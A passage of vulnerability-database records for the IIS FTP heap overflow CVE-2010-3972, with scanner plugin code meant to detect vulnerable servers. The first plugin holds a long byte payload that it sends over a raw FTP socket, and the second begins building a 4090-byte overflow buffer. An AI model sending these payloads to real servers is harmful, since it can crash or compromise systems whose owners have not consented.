0xff, 0xef, 0xfe, 0xff, 0xfe,\n0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xfe, 0xff,\n0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef,\n0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb,\n0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xfe, 0xff,\n0xff, 0xef, 0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff,\n0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff,\n0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef,\n0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef,\n0xfe, 0xff, 0xff, 0xef, 0xff, 0xef, 0xfe, 0xff,\n0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xef, 0xbb,\n0xbf, 0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef, 0xfe,\n0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef,\n0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,\n0xfe, 0xff, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb,\n0xbf, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf,\n0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef,\n0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff, 0xfe,\n0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe,\n0xff, 0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff,\n0xff, 0xef, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb,\n0xbf, 0xfe, 0xff, 0xff, 0xef, 0xff, 0xef, 0xff,\n0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff,\n0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff,\n0xfe, 0xff, 0xff, 0xef, 0xff, 0xef, 0xfe, 0xff,\n0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xff,\n0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xfe, 0xff,\n0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf,\n0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef,\n0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff,\n0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef,\n0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff,\n0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff, 0xef,\n0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xfe, 0xff,\n0xfe, 0xff, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb,\n0xbf, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf,\n0xff, 0xef, 0xff, 0xef, 0xff, 0xef, 0xfe, 0xff,\n0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef,\n0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff,\n0xef, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef,\n0xfe, 0xff, 0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff,\n0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff,\n0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef,\n0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff,\n0xef, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef,\n0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff,\n0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb,\n0xbf, 0xff, 0xef, 0xff, 0xef, 0xfe, 0xff, 0xff,\n0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb,\n0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff,\n0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xfe, 0xff,\n0xfe, 0xff, 0xff, 0xef, 0xff, 0xef, 0xff, 0xef,\n0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,\n0xff, 0xef, 0xff, 0xef, 0xfe, 0xff, 0xff, 0xef,\n0xff, 0xef, 0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff,\n0xfe, 0xff, 0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff,\n0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef,\n0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb,\n0xbf, 0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf,\n0xff, 0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff,\n0xef, 0xfe, 0xff, 0xfe, 0xff, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef,\n0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf,\n0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff, 0xff, 0xef,\n0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef,\n0xbb, 0xbf, 0xfe, 0xff, 0xfe, 0xff, 0xef, 0xbb,\n0xbf, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe,\n0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb,\n0xbf, 0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff, 0xfe,\n0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef,\n0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,\n0xff, 0xef, 0xff, 0xef, 0xff, 0xef, 0xfe, 0xff,\n0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xfe,\n0xff, 0xfe, 0xff, 0xfe, 0xff, 0xef, 0xbb, 0xbf,\n0xff, 0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff,\n0xef, 0xff, 0xef, 0xfe, 0xff, 0xff, 0xef, 0xfe,\n0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb,\n0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef,\n0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef,\n0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xfe, 0xff,\n0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff,\n0xfe, 0xff, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xfe,\n0xff, 0xfe, 0xff, 0xfe, 0xff, 0xef, 0xbb, 0xbf,\n0xfe, 0xff, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb,\n0xbf, 0xfe, 0xff, 0xfe, 0xff, 0xff, 0xef, 0xef,\n0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff,\n0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef,\n0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xfe,\n0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb,\n0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff,\n0xef, 0xff, 0xef, 0xff, 0xef, 0xfe, 0xff, 0xef,\n0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,\n0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff,\n0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff, 0xfe,\n0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef,\n0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff,\n0xff, 0xef, 0xff, 0xef, 0xff, 0xef, 0xfe, 0xff,\n0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef,\n0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff, 0xff, 0xef,\n0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xff, 0xef,\n0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff, 0xff, 0xef,\n0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef,\n0xff, 0xef, 0xff, 0xef, 0xfe, 0xff, 0xff, 0xef,\n0xfe, 0xff, 0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff,\n0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf,\n0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe,\n0xff, 0xfe, 0xff, 0xfe, 0xff, 0xef, 0xbb, 0xbf,\n0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xfe,\n0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff,\n0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff,\n0xff, 0xef, 0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff,\n0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef,\n0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb,\n0xbf, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe,\n0xff, 0xfe, 0xff, 0xff, 0xef, 0xff, 0xef, 0xff,\n0xef, 0xfe, 0xff, 0xfe, 0xff, 0xef, 0xbb, 0xbf,\n0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff, 0xef, 0xbb,\n0xbf, 0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf,\n0xff, 0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef,\n0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xff, 0xef,\n0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff, 0xff,\n0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb,\n0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef,\n0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,\n0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff,\n0xef, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef,\n0xfe, 0xff, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb,\n0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef,\n0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xfe, 0xff, 0xfe,\n0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff,\n0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef,\n0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff, 0xff, 0xef,\n0xff, 0xef, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb,\n0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef,\n0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef,\n0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef, 0xff,\n0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb,\n0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef,\n0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef,\n0xbb, 0xbf, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff,\n0xff, 0xef, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef,\n0xbb, 0xbf, 0xfe, 0xff, 0xfe, 0xff, 0xef, 0xbb,\n0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb,\n0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff,\n0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb,\n0xbf, 0xfe, 0xff, 0xff, 0xef, 0xff, 0xef, 0xfe,\n0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xef,\n0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xfe, 0xff,\n0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff, 0xef,\n0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff,\n0xef, 0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf,\n0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff, 0xef, 0xbb,\n0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef,\n0xfe, 0xff, 0xfe, 0xff, 0xff, 0xef, 0xff, 0xef,\n0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf,\n0xff, 0xef, 0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb,\n0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb,\n0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb,\n0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xfe, 0xff,\n0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef, 0xfe,\n0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb,\n0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb,\n0xbf, 0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff, 0xff,\n0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef,\n0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff,\n0xef, 0xff, 0xef, 0xfe, 0xff, 0xff, 0xef, 0xef,\n0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff,\n0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff,\n0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff,\n0xff, 0xef, 0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff,\n0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xfe, 0xff, 0xfe,\n0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xff,\n0xef, 0xfe, 0xff, 0xff, 0xef, 0xff, 0xef, 0xff,\n0xef, 0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff, 0xef,\n0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb,\n0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef,\n0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe,\n0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef,\n0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef,\n0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf,\n0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef,\n0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb,\n0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb,\n0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe,\n0xff, 0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff, 0xef,\n0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff,\n0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb,\n0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb,\n0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb,\n0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb,\n0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef,\n0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff,\n0xef, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xef,\n0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xfe,\n0xff, 0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff, 0xff,\n0xef, 0xff, 0xef, 0xfe, 0xff, 0xff, 0xef, 0xff,\n0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef,\n0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb,\n0xbf, 0xff, 0xef, 0xfe, 0xff, 0xff, 0xef, 0xfe,\n0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff,\n0xef, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef,\n0xff, 0xef, 0xff, 0xef, 0xff, 0xef, 0xff, 0xef,\n0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff,\n0xef, 0xff, 0xef, 0xff, 0xef, 0xfe, 0xff, 0xef,\n0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff,\n0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff, 0xef,\n0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff,\n0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff,\n0xff, 0xef, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb,\n0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb,\n0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb,\n0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb,\n0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb,\n0xbf, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xfe,\n0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef,\n0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xff,\n0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef,\n0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff,\n0xef, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe,\n0xff, 0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf,\n0xff, 0xef, 0xfe, 0xff, 0xff, 0xef, 0xff, 0xef,\n0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,\n0xff, 0xef, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb,\n0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb,\n0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb,\n0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef,\n0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef,\n0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef,\n0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff, 0xfe,\n0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xff,\n0xef, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf,\n0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff,\n0xef, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb,\n0xbf, 0xfe, 0xff, 0xfe, 0xff, 0xef, 0xbb, 0xbf,\n0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb,\n0xbf, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf,\n0xff, 0xef, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff,\n0xef, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf,\n0xff, 0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xfe,\n0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xfe, 0xff,\n0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,\n0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe,\n0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff,\n0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff,\n0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb,\n0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef,\n0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff,\n0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xfe, 0xff,\n0xff, 0xef, 0xff, 0xef, 0xff, 0xef, 0xff, 0xef,\n0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef, 0xef,\n0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb,\n0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb,\n0xbf, 0xef, 0xbb, 0xbf, 0x0d, 0x0a );\n\n## Open TCP Socket\nsoc = open_sock_tcp(ftpPort);\nif(!soc) {\n exit(0);\n}\n\nbanner = recv_line(socket:soc, length:100);\n\n## Sending Attack\nsnd = send(socket:soc, data:attack);\n\n## Response\nres = recv_line(socket:soc, length:6400);\n\n## Checking Vulnerable Patterns\nif(res =~ '^\\x30\\0x31\\x20\\x27\\xef\\x83\\xb0*\\xff')\n{\n security_message(port:ftpPort);\n exit(0);\n}\nclose(soc);\n", "naslFamily": "Denial of Service", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 0}}
{"securityvulns": [{"lastseen": "2021-06-08T19:16:42", "description": "Heap buffer overflow.", "edition": 2, "cvss3": {}, "published": "2011-02-08T00:00:00", "title": "Microsoft IIS FTP Server buffer overflow", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2010-3972"], "modified": "2011-02-08T00:00:00", "id": "SECURITYVULNS:VULN:11411", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11411", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-10-16T15:20:31", "description": "The IIS FTP service running on the remote host has a heap-based buffer overflow vulnerability. The 'TELNET_STREAM_CONTEXT::OnSendData' function fails to properly sanitize user input, resulting in a buffer overflow.\n\nAn unauthenticated, remote attacker can exploit this to execute arbitrary code.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2011-02-11T00:00:00", "type": "nessus", "title": "MS11-004: Vulnerability in Internet Information Services (IIS) FTP Service Could Allow Remote Code Execution (2489256) (uncredentialed check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3972"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/a:microsoft:iis"], "id": "IIS_FTP7_HEAP_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/nessus/51956", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(51956);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2018/11/15 20:50:27\");\n\n script_cve_id(\"CVE-2010-3972\");\n script_bugtraq_id(45542);\n script_xref(name:\"EDB-ID\", value:\"15803\");\n script_xref(name:\"MSFT\", value:\"MS11-004\");\n script_xref(name:\"MSKB\", value:\"2489256\");\n\n script_name(english:\"MS11-004: Vulnerability in Internet Information Services (IIS) FTP Service Could Allow Remote Code Execution (2489256) (uncredentialed check)\");\n script_summary(english:\"Checks for IIS FTP Service heap overflow vulnerability\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The FTP service running on the remote host has a memory corruption\nvulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The IIS FTP service running on the remote host has a heap-based buffer\noverflow vulnerability. The 'TELNET_STREAM_CONTEXT::OnSendData'\nfunction fails to properly sanitize user input, resulting in a buffer\noverflow.\n\nAn unauthenticated, remote attacker can exploit this to execute\narbitrary code.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2011/ms11-004\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 2008\nR2, and 7.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2010-3972\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/12/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/02/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/02/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:iis\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_require_ports(\"Services/ftp\", 21);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"ftp_func.inc\");\n\n\nport = get_ftp_port(default:21);\nbanner = get_ftp_banner(port:port);\nif (! banner) exit(1, \"Could not retrieve the banner from the FTP server on port \"+port+\".\");\n\nif (banner !~ \"^22. *Microsoft FTP Service\")\n exit(0, \"The FTP service on port \"+port+\" does not appear to be Microsoft FTP.\");\n\nsoc = open_sock_tcp(port);\nif (!soc) exit(1, \"Failed to open a socket on port \"+port+\".\");\n\nftp_debug(str:\"custom\");\nbanner = ftp_recv_line(socket:soc);\nif ( isnull(banner) ) exit(1, \"Could not retrieve the banner from the FTP server on port \"+port+\".\");\n\nif (banner !~ \"^22. *Microsoft FTP Service\")\n exit(0, \"The FTP service on port \"+port+\" does not appear to be Microsoft FTP.\");\n\n\ndata = crap(data:'A', length:4090);\ndata 